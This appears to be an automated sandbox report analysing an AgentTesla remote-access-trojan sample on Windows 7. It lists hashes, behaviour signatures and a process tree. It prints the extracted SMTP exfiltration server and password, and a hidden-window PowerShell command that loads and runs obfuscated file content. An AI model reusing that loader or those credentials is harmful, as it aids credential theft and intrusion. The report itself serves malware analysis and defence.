Analysis
-
max time kernel
142s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
10-09-2024 02:06
Static task
static1
Behavioral task
behavioral1
Sample
9f3b919ce19ec77455cf976bca1489292959e2032e7498c3daa6099b2ea90d8c.exe
Resource
win7-20240903-en
General
-
Target
9f3b919ce19ec77455cf976bca1489292959e2032e7498c3daa6099b2ea90d8c.exe
-
Size
495KB
-
MD5
d6ff66eeba266a3eda5af0c40d6a5deb
-
SHA1
ebcb218d12b52e4567046e7c73bfba896b1fa09a
-
SHA256
9f3b919ce19ec77455cf976bca1489292959e2032e7498c3daa6099b2ea90d8c
-
SHA512
3b87e4dc73ec79253361da82a531fd7da75e23afae7792e31e7b014339994d30d91372d6795f692e5e6e5256ca51204c87af1938533fddba596eb814c68f87c9
-
SSDEEP
12288:IIFypJoDAP2wEve+g3c9kP9/kVTtFwP0nRUw:DMpqAP2Nve+g3cheP0Ww
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
cp8nl.hyperhost.ua - Port:
587 - Username:
[email protected] - Password:
7213575aceACE@#$ - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2668 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 3 drive.google.com 5 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1524 ImagingDevices.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2668 powershell.exe 1524 ImagingDevices.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2668 set thread context of 1524 2668 powershell.exe 33 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ImagingDevices.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9f3b919ce19ec77455cf976bca1489292959e2032e7498c3daa6099b2ea90d8c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2668 powershell.exe 2668 powershell.exe 2668 powershell.exe 2668 powershell.exe 2668 powershell.exe 2668 powershell.exe 1524 ImagingDevices.exe 1524 ImagingDevices.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2668 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2668 powershell.exe Token: SeDebugPrivilege 1524 ImagingDevices.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 2712 wrote to memory of 2668 2712 9f3b919ce19ec77455cf976bca1489292959e2032e7498c3daa6099b2ea90d8c.exe 30 PID 2712 wrote to memory of 2668 2712 9f3b919ce19ec77455cf976bca1489292959e2032e7498c3daa6099b2ea90d8c.exe 30 PID 2712 wrote to memory of 2668 2712 9f3b919ce19ec77455cf976bca1489292959e2032e7498c3daa6099b2ea90d8c.exe 30 PID 2712 wrote to memory of 2668 2712 9f3b919ce19ec77455cf976bca1489292959e2032e7498c3daa6099b2ea90d8c.exe 30 PID 2668 wrote to memory of 1524 2668 powershell.exe 33 PID 2668 wrote to memory of 1524 2668 powershell.exe 33 PID 2668 wrote to memory of 1524 2668 powershell.exe 33 PID 2668 wrote to memory of 1524 2668 powershell.exe 33 PID 2668 wrote to memory of 1524 2668 powershell.exe 33 PID 2668 wrote to memory of 1524 2668 powershell.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\9f3b919ce19ec77455cf976bca1489292959e2032e7498c3daa6099b2ea90d8c.exe"C:\Users\Admin\AppData\Local\Temp\9f3b919ce19ec77455cf976bca1489292959e2032e7498c3daa6099b2ea90d8c.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Fuldbefarne=Get-Content 'C:\Users\Admin\AppData\Local\Konfektionernes\Eguns\Aliyahs50.Fum83';$Dewily=$Fuldbefarne.SubString(54482,3);.$Dewily($Fuldbefarne)2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1524
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
293KB
MD5fc155ecd1d3b38dccc9111c2087c4974
SHA1cf19a32f72400ea1752d540462fad29d05a03fe9
SHA25685e172bb4f0df35b2923509cdd0f3de71ec830941663ba42711076013e17c309
SHA51247c6878d2648f1ceb36a3427c7abb941ea0e439a8d0aa523339281bcad0fda7f5a1ba69b6046b8b1cba37847f133c24f47ca2a9aaac65cf384caeeb59c57071d
-
Filesize
53KB
MD5a6abe8564e8a1748c26ebc018b7fc04c
SHA1ef27a0811cd96ec4543b383590248dcd3b3bfd43
SHA256fbf68ceb0677bbb4381445f77cbfe9f916f6191fe734da78a29f86a98bb8b4bc
SHA5121780d11205ca91e80b5556fb4d2d43bb9476a17010a005f5914a50abba2a110a3b4e52b0f86d803a1a06c5c59e1f62b3d2ae3249977028416378b67595a41d8a